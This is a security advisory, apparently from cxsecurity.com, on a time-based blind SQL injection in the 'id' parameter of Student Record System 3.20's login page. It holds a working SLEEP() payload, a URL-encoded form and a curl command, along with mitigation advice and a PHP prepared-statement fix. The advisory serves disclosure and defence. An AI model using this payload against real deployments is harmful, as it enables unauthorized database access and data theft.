Student Record System 3.20 - 'id' Parameter Time-based Blind SQL Injection

2025.10.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Tested locally on localhost; the vulnerability is remotely exploitable if the server is bound to a network interface.

Exploit Title: Student Record System 3.20 - 'id' Parameter Time-based SQL Injection
Date: 2025-10-21
Exploit Author: Şeyma Yaldız
Vendor Homepage: https://phpgurukul.com/student-record-system-php/
Target (example): http://localhost:8080/studentrecordms/login.php
Version: 3.20
Tested on: Windows, XAMPP / Kali Linux
CVE: N/A
CWE: CWE-89 (SQL Injection)
Remote: Yes
Local: No

Short description:
A time-based blind SQL injection exists in the POST parameter `id` of /studentrecordms/login.php. Injecting a payload that uses MySQL's SLEEP() causes measurable backend delays, confirming blind SQLi and enabling blind data extraction techniques.

Vulnerability details:
- Affected component: login module
- Endpoint: /studentrecordms/login.php
- HTTP Method: POST
- Affected parameter: `id` (application/x-www-form-urlencoded)

Minimal Proof-of-Concept (human-readable):

POST /studentrecordms/login.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

id=' AND (SELECT 9104 FROM (SELECT(SLEEP(15)))VHur)-- vPWX&password=test&submit=login

URL-encoded payload (for tools / curl):

id=%27%20AND%20%28SELECT%209104%20FROM%20%28SELECT%28SLEEP%2815%29%29%29VHur%29--%20vPWX

curl example:

curl -s -X POST "http://localhost:8080/studentrecordms/login.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data "id=%27%20AND%20%28SELECT%209104%20FROM%20%28SELECT%28SLEEP%2815%29%29%29VHur%29--%20vPWX&password=test&submit=login" \
  -w "\nHTTP_CODE:%{http_code}\nTIME_TOTAL:%{time_total}\n"

Reproduction Steps:
1. Host the application on an isolated test instance (do NOT target live/third-party sites).
2. Send the POST request above (curl / Burp / requests) and measure response time.
3. Adjust the sleep value to confirm reliability. Consistent ~N second delays indicate a successful time-based blind SQLi.

Impact:
- Time-based blind SQLi may allow data extraction, authentication bypass, or other high-impact attacks depending on database privileges.
- Preliminary severity: High.

Mitigation:
- Use parameterized queries / prepared statements for all database interactions.
- Implement strict server-side input validation and allowlisting.
- Operate database accounts with least privilege.
- Avoid exposing database error messages to end users.

Notes:
- PoC targets example/test host only (localhost:8080). Replace with test instance URL.
- Test only systems you own or have explicit permission to test.
- Contact: Şeyma Yaldız
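The following is an added illustration of the mitigation bullets, not code from the Student Record System project or from the advisory author. It shows a login lookup that interpolates the `id` parameter into the SQL text, which is the shape of flaw this advisory describes, next to the same lookup rewritten with PDO prepared statements, an allowlist check on the identifier, and a connection configured to surface errors as exceptions rather than to the user. The table and column names (`tblstudent`, `StudentId`, `Password`), the identifier format, the DSN and the `app_user` account are assumptions made for the example. With the parameterized version the `SLEEP()` payload is bound as a string literal and compared against the column, so it never becomes part of the statement.

```php
<?php
// Added example, not the vendor's code. Table/column names are assumptions.

// Vulnerable pattern: user input concatenated into the SQL text.
// A value such as "' AND (SELECT SLEEP(15))-- x" is parsed as SQL.
function findStudentVulnerable(mysqli $db, string $id, string $password): ?array
{
    $sql = "SELECT StudentId FROM tblstudent WHERE StudentId='$id' AND Password='$password'";
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened pattern: the SQL text is fixed; the value travels separately as a
// bound parameter. The server never parses user input as SQL, so SLEEP() is
// just a string that matches no StudentId.
function findStudentSafe(PDO $db, string $id, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT StudentId, Password FROM tblstudent WHERE StudentId = :id'
    );
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    // Assumes Password holds a password_hash() value; verify in PHP rather
    // than comparing plaintext inside the query.
    if (!password_verify($password, $row['Password'])) {
        return null;
    }
    return ['StudentId' => $row['StudentId']];
}

// Defence in depth: allowlist the identifier format before it reaches the DB.
// Assumed format for this example: 3 to 20 alphanumeric characters.
function isValidStudentId(string $id): bool
{
    return preg_match('/^[A-Za-z0-9]{3,20}$/', $id) === 1;
}

// Connection for the hardened path: real server-side binding (no emulated
// prepares), exceptions on error, and a low-privilege application account.
function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// Usage sketch for a login.php handler (values are placeholders):
$pdo = connect('mysql:host=127.0.0.1;dbname=studentrecordms;charset=utf8mb4', 'app_user', 'CHANGE_ME');
$id = $_POST['id'] ?? '';
$password = $_POST['password'] ?? '';
try {
    if (!isValidStudentId($id) || findStudentSafe($pdo, $id, $password) === null) {
        http_response_code(401);
        echo 'Invalid credentials.'; // generic message, no SQL detail
    } else {
        echo 'Login OK.';
    }
} catch (PDOException $e) {
    error_log($e->getMessage());   // log server-side only
    http_response_code(500);
    echo 'An error occurred.';     // never echo the driver message to the user
}
```

Because the SQL text in `findStudentSafe` is identical for every request, a malformed `id` can only fail to match; it cannot add a subquery, and a time-based probe returns in the same time as any other failed login.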

References:

Vendor:
https://phpgurukul.com/student-record-system-php/
Exploit-DB: N/A


Copyright 2025, cxsecurity.com